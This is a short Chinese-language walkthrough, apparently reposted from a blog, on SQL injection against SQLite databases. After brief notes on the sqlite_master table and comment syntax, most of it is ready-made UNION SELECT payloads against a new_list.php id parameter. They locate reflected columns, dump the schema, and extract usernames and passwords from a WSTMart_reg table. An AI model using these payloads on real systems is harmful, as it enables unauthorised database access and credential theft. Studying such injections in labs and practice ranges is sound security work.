sqlite数据库大部分在开发时使用,其注入语句也与其他数据库不同
- sqlite数据库有一张sqlite_master表,里面有type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息
- sqlite数据库的注释符是两个横杠“--”,空格会自动用加号表示
- 测试回显位置, /new_list.php?id=1 union select 1,2,3,4
- 开始爆这个表的字段值/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master
- 直接查/new_list.php?id=1 union select 1,name,password,4 from WSTMart_reg
附参考地址:https://blog.csdn.net/qq_39936434/article/details/94722615
原文地址:https://www.cnblogs.com/weak-chicken/p/12283925.html
时间: 2024-11-05 20:37:40